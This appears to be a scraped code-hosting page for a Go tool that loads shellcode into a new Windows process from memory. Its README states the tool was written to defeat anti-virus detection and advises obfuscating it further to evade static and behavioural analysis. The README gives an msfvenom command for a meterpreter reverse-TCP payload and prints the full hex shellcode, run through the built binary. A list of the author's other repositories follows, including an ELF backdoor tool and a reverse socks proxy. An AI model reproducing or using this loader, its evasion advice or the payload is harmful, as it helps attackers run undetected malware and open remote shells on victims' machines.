• Stars
    star
    757
  • Rank 59,989 (Top 2 %)
  • Language
    Go
  • Created over 6 years ago
  • Updated over 3 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Load shellcode into a new process

shellcode

This is a program to run shellcode as its own process, all from memory. This was written to defeat anti-virus detection. This is now getting detected as VirTool:Win32/Shrine.A. Use a tool like garble to obfuscate the binary to defeat static analysis. Change the code yourself to defeat behavior analysis.

Usage

Keep in mind that only 64bit shellcode will run in a 64bit process. This can't autodetect your shellcode architecture.

Use msfvenom or metasploit to generate a bit of shellcode as hex format:

$ msfvenom -p windows/meterpreter/reverse_tcp -f hex -o rev.hex LHOST=127.0.0.1 LPORT=4444
c:\windows\temp>sc.exe fce8820000006089e531c0648b50308b520c8b52148b72280fb74a2631ffac3c617c022c20c1cf0d01c7e2f252578b52108b4a3c8b4c1178e34801d1518b592001d38b4918e33a498b348b01d631ffacc1cf0d01c738e075f6037df83b7d2475e4588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe05f5f5a8b12eb8d5d6833320000687773325f54684c77260789e8ffd0b89001000029c454506829806b00ffd56a0a687f000001680200115c89e6505050504050405068ea0fdfe0ffd5976a1056576899a57461ffd585c0740aff4e0875ece8670000006a006a0456576802d9c85fffd583f8007e368b366a406800100000566a006858a453e5ffd593536a005653576802d9c85fffd583f8007d285868004000006a0050680b2f0f30ffd55768756e4d61ffd55e5eff0c240f8570ffffffe99bffffff01c329c675c1c3bbf0b5a2566a0053ffd5

Sometimes the shellcode is larger than the limit of a command line with arguments. Try putting the whole thing in a batch script instead.

Build

Standard go building steps. Set GOOS to windows and GOARCH to the same as your shellcode, either 386 or amd64. This can't detect the architecture of your shellcode.

The resulting binary is a little big, 2.1M, but compresses well with UPX, roughly 508K.

More Repositories

1

fastcoll

C++
141
star
2

windows-ova

Self-Installing Windows OVA. Automate and distribute Windows as an OVA.
Shell
111
star
3

rsocks

Tiny little reverse socks5 client & server
Go
82
star
4

docker-kali

A Docker image for bits of Kali Linux
Shell
29
star
5

twitter-lists

Auto updating archive of my Twitter lists.
Go
15
star
6

docker-golang-musl

Docker container to build golang static binaries with musl instead of glibc
Shell
13
star
7

jq-httpd

JSON Processor, as a Service
Go
8
star
8

infect

Simple C program to backdoor ELF executables
C
7
star
9

caddy-consul

consul plugin for caddy
Go
7
star
10

pcd

How Appliances Should Be.
Makefile
6
star
11

docker-golang

Docker image for cross compiling go with CGO for linux (desktops and Raspberry Pis), Windows, MacOS, and FreeBSD
Shell
6
star
12

nodejs-openwrt

Former project for nodejs on openwrt
5
star
13

docker-volume-rclone

Docker volume plugin for rclone
Go
5
star
14

tpb-backup

Go
4
star
15

docker-jenkins

Shell
4
star
16

shellload

Load shellcode into a new process, optionally under a false name.
C
4
star
17

consuldock

Dynamic Consul Node/service creation based on docker containers
Go
3
star
18

dargo

Deploy apps directly to docker
Go
3
star
19

data-35c3-ftp

Hourly scans of the 35c3 ftp network
Shell
3
star
20

dotfiles

My dotfiles
Lua
3
star
21

go-pcd

API daemon and controlling program for https://github.com/brimstone/pcd
Go
3
star
22

github-mirror

Github mirroring utility
Go
3
star
23

pen-300

Tracking my PEN-300 progress
3
star
24

tiddlywiki-server

Go
3
star
25

handbook

Personal handbook for pentesting/redteaming
Makefile
3
star
26

bin

Shell
2
star
27

nmap-diff

Simply shows the difference between two nmap scan xmls
Go
2
star
28

docker-kvm

Wacky proof-of-concept for kvm in Docker
Dockerfile
2
star
29

sslh

Listener that determines SSL, HTTP, SSH, or other connections on the same port
Go
2
star
30

go-twitter

Just a little wrapper around github.com/dghubble/go-twitter for cli apps
Go
2
star
31

packer-linux

templates for debian distros for packer
Shell
2
star
32

wordle-solver

Go
2
star
33

docker-postgres

postgres container image with traefik-cert support
Dockerfile
2
star
34

go-dht-spider

Go
2
star
35

mdcms

Super simple markdown based CMS
JavaScript
2
star
36

go-vboxmanage

Go
2
star
37

awk-gir

Awk
2
star
38

gopherjs-framework

Go
2
star
39

stars

My starred GitHub repositories
2
star
40

emergent-mesh

OpenWRT package for Emergent Mesh project: https://256.makerslocal.org/wiki/Emergent_Mesh
JavaScript
2
star
41

learn-hacking

Learning Hacking by doing
PowerShell
2
star
42

go-ldpreload

LD_PRELOAD library with Go
Go
2
star
43

docker-unison

Docker container to run unison and synchronize with itself
Shell
2
star
44

togglstat

Simple tool for tracking timecards with toggl
Go
2
star
45

watchdock

Watchdog for Docker containers. Go and Consul version.
Go
2
star
46

heardle-study-guide

I got tired of losing heardle
HCL
2
star
47

meshtastic-prezo

Presentation about Meshtastic
JavaScript
1
star
48

data-32c3-ftp

Shell
1
star
49

bumps

Perl
1
star
50

timetracker

Shell
1
star
51

go-backoff

A simple backoff function for Go.
Go
1
star
52

cryptoclicker

An experiment with gopherjs and vecty.
Go
1
star
53

docker-node-red

JavaScript
1
star
54

peerpipe

Super simple program to connect unix pipes with peers.
Go
1
star
55

maintemail

Automated Maintenance Email based on ICS feed
Python
1
star
56

go-erc20

Go
1
star
57

go-domainglass

A single pane of glass into the status of your domain.
HTML
1
star
58

gpd-pocket-kernel

Linux Kernel for GPD Pocket
Shell
1
star
59

mytter

Twitter API Compatible Server
PHP
1
star
60

vulnerable-vms

Vulnerable VMs
PowerShell
1
star
61

pocket

App that toots github stars and pocket archives
Go
1
star
62

metrics-agent

1
star
63

gopherjs-asset

Go
1
star
64

arduino-footpedal

Arduino sketch for my footpedal
C++
1
star
65

storagenode-stats

Stats for your storagenode
Shell
1
star
66

fss

`fss` is a simple, bare bones, only-needs-a-posix-shell idempotent system provisioner.
Shell
1
star
67

raspi-kedei-lcd

C
1
star
68

docker-galera

Docker container for a MySQL server with wsrep extensions provided by Galera
Shell
1
star
69

post-brimstone-harden

Metasploit post modules for hardening systems.
Ruby
1
star
70

metasploit-modules

Just a few metasploit modules
Ruby
1
star
71

aoc

My Advent of Code solutions
Nim
1
star
72

docker-centos

Docker image for centos
Shell
1
star
73

slackbot

A very opinionated framework for building slackbots
Go
1
star
74

dstm

Manage swarm tokens, better?
Go
1
star
75

docker-ionic

Shell
1
star
76

dev

My development environment
Shell
1
star
77

awesome-startdown

1
star
78

docker-caddy

Go
1
star
79

ipxe-iso

Reproducable ipxe ISO for reproducably booting across networks
1
star
80

brimstone

1
star
81

docker-consul

Docker container for consul.io
Shell
1
star
82

projectbuilder

Opinionated build process.
Makefile
1
star
83

docker-goiardi

Docker image for goiardi
1
star
84

jwt

A simple jwt library and utility.
Go
1
star
85

go-livereload

Single binary that implements a webserver, livereload server, and watches every file and directory in the current directory for changes.
Go
1
star
86

dmarc-report

Decypher DMARC reports
Go
1
star